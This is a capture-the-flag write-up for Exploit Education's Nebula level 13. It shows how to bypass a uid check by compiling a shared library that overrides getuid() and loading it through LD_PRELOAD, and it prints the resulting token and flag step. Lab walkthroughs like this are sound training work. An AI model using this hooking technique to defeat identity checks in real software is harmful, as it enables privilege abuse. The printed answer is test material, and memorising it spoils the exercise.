Exploit-Education Nebula Level 13
Exploit Education Level 13
Challenge
There is a security check that prevents the program from continuing execution if the user invoking it does not match a specific user id.
To do this level, log in as the level13 account with the password level13. Files for this level can be found in /home/flag13.
So it seems to be a simple program. A getuid function call is made and if the returned uid is 1000, the program
displays the token.
Vulnerability
if(getuid() != FAKEUID) {
We can abuse the LD_PRELOAD env variable to intercept the getuid function call.
Abusing LD_PRELOAD
LD_PRELOAD lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so. If you want to override just a few selected functions, you can do this by creating an overriding object file and setting LD_PRELOAD; the functions in this object file will ?>override just those functions leaving others as they were.
So basically we can override any function calls made by a program by creating our own shared library and loading it
using the LD_PRELOAD env variable. So lets write a c program to override the getuid function and compile it as
a shared library.
Solution
level13@nebula:~$ cat gid.c
#include <sys/types.h>
uid_t getuid(void)
{
return 1000;
}
Compile it as a shared library and set the LD_PRELOAD variable to point to our compiled file
gcc -o getuid.so -fPIC -shared gid.c -ldl
LD_PRELOAD=$PWD/getuid.so
There is one restriction. The shared library and the program loading it should have the same uid or it wont work. Since we have read permissions, lets just copy the file to the home directory and run it.
level13@nebula:/home/flag13$ cp flag13 /home/level13/flag13
level13@nebula:~$ ./flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
level13@nebula:~$ su -l flag13
Password:
flag13@nebula:~$ getflag
You have successfully executed getflag on a target account
